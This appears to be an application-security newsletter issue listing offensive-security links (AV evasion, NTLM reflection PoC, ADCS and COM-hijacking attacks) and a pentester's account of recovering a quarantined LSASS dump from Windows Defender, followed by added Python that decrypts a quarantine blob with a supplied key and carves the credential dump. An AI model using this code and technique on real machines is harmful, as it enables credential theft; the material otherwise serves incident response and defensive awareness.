AppSec Ezine - 592nd https://pathonproject.com/zb/?fc916f3ce2c94d73#BSkiwWtmolrPqTOC7ADUoqPgyFp+WDI22jnz6PEZHx8= #AppSec #Security
Penetration Tester
Administrator Protection Review https://specterops.io/blog/2025/06/18/administrator-protection/
Chisel Client: From 16/65 to 1/65 flagged on VirusTotal https://jadu101.github.io/RedTeam/AV-Evasion/AV-Evasion-with-Chisel
I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed).
The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process to disk.
However, as soon as I tried to copy the dump to my Kali machine, Defender jumped into action, prohibited access to the LSASS dump, and moved the file to quarantine. And here is the catch.
I browsed to the following folder:
C:\ProgramData\Microsoft\Windows Defender\Quarantine
In the ResourceData folder, you will find different sub-folders (or not, if Defender never quarantined something on that host), each folder containing a quarantine file.
The files are encrypted with a static key that leaked years ago, and this 10-year-old code snippet is still sufficient to decrypt the files back to their original state. [2]
Long story short: I copied the encrypted file to my Kali machine, decrypted it using the Python code from [2], and extracted the credentials and hashes with pypykatz. [3]
Classic example of "No, it's not enough when your AV blocked or removed a threat". As you can see, an attacker can easily get the LSASS dump, even if Defender removed it from the disk ¯\_(ツ)_/¯
[1] https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
[2] https://raw.githubusercontent.com/malmoeb/DFIR/refs/heads/master/quarantine.py
[3] https://github.com/skelsec/pypykatz
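As an added example (not the poster's code and not the quarantine.py from [2]), here is the recovery step in a form you can reason about: a Defender quarantine file in ResourceData is a single RC4-encrypted blob, so anyone holding the leaked static key can turn it back into the original file. The key itself is deliberately not reproduced here; supply it as hex on the command line after taking it from [2]. Instead of relying on a particular layout of the quarantine header, this version decrypts the whole blob and carves the minidump by its `MDMP` signature, which is what a MiniDumpWriteDump file starts with. The blob used in `__main__` is constructed in the script, not a real quarantine file.

```python
"""Decrypt a Defender ResourceData quarantine blob with a supplied RC4 key and
carve the embedded LSASS minidump.  Example code added to this newsletter
entry; the static Defender key is an input, not embedded here."""
import sys
from pathlib import Path
from typing import Optional

# Every file written by MiniDumpWriteDump starts with this signature.
MINIDUMP_MAGIC = b"MDMP"


def rc4_keystream(key: bytes):
    """Yield RC4 keystream bytes for `key` (key-scheduling, then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a symmetric XOR stream: the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def carve_minidump(decrypted: bytes) -> Optional[bytes]:
    """Return the minidump starting at its MDMP signature, or None if absent.
    Searching for the magic avoids depending on the quarantine header size."""
    offset = decrypted.find(MINIDUMP_MAGIC)
    if offset < 0:
        return None
    return decrypted[offset:]


def recover_quarantined_dump(blob: bytes, key: bytes) -> Optional[bytes]:
    """Decrypt a ResourceData blob with `key` and carve the minidump out of it."""
    return carve_minidump(rc4(key, blob))


def build_constructed_blob(key: bytes, payload: bytes, header_len: int = 0x40) -> bytes:
    """Constructed test input: an opaque stand-in header followed by a fake
    minidump, RC4-encrypted the way a quarantine file is.  The real header
    layout is not modelled; only the signature search above matters."""
    fake_header = b"\x00" * header_len
    return rc4(key, fake_header + payload)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: quarantine_carve.py <ResourceData blob> <rc4 key as hex>")
    blob = Path(sys.argv[1]).read_bytes()
    key = bytes.fromhex(sys.argv[2])  # the static key from [2], not embedded here
    dump = recover_quarantined_dump(blob, key)
    if dump is None:
        sys.exit("no MDMP signature after decryption: wrong key or not a minidump")
    out = Path(sys.argv[1]).with_suffix(".dmp")
    out.write_bytes(dump)
    print(f"wrote {len(dump)} bytes to {out}; feed it to pypykatz [3]")
```

The carved `.dmp` is then parsed exactly as the post describes (`pypykatz lsa minidump <file>`). The operational lesson for defenders is the one the post draws: quarantine is reversible by design, so the quarantine directory needs the same access control and monitoring as the dump it contains, and an "AV removed it" verdict should not close a credential-access investigation.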
And this is our pull request to NetExec which adds efsr_spray which can re-enable EFSR/PetitPotam on up-to-date Windows 11 hosts 🤯 if they have a writeable share:
Introducing the BloodHound Query Library https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
A solid, back-to-basics overview of lateral movement from @huntress:
https://www.huntress.com/blog/how-huntress-addresses-lateral-movement
PoC Exploit for the NTLM reflection SMB flaw https://github.com/mverschu/CVE-2025-33073
“Localhost tracking” explained. It could cost Meta 32 billion. https://www.zeropartydata.es/p/localhost-tracking-explained-it-could
Based on our testing, MS seems to have fixed CVE-2025-33073 by blocking the CredUnmarshalTargetInfo/CREDENTIAL_TARGET_INFORMATIONW trick!
@tiraniddo @decoder_it #netsec #infosec #windows #cybersecurity
https://mastodon.social/@RedTeamPentesting/114663688487284108
wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP https://github.com/RedTeamPentesting/wspcoerce
NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
Getting RCE on Monero forums with wrapwrap https://swap.gs/posts/monero-forums/
Win Free Access to the PT1 Certification https://docs.google.com/forms/d/e/1FAIpQLSfteKn7mdw9_Ov3gQZkqYAsX3MxWT8NPxgU-5S51Jsp3jwZPg/viewform
This post describes how COM hijacking enables attackers to persist by loading malicious code through trusted Windows applications like Chrome 🕵️‍♂️
https://specterops.io/blog/2025/05/28/revisiting-com-hijacking
I just pwned TombWatcher on Hack The Box! https://www.hackthebox.com/achievement/machine/52014/664 #HackTheBox
Surprise surprise, 5 minutes of reading Cloudflare's AI-generated OAuth provider shows that it was not, in fact, "thoroughly reviewed and cross-referenced with relevant RFCs, by security experts with previous experience with those RFCs"
https://github.com/cloudflare/workers-oauth-provider/issues/41
Breaking ADCS: ESC1 to ESC16 Attack Techniques https://xbz0n.sh/blog/adcs-complete-attack-reference
"NO CGI" is really just INVISIBLE CGI (5/5) https://www.youtube.com/watch?v=hniWOH_zwh8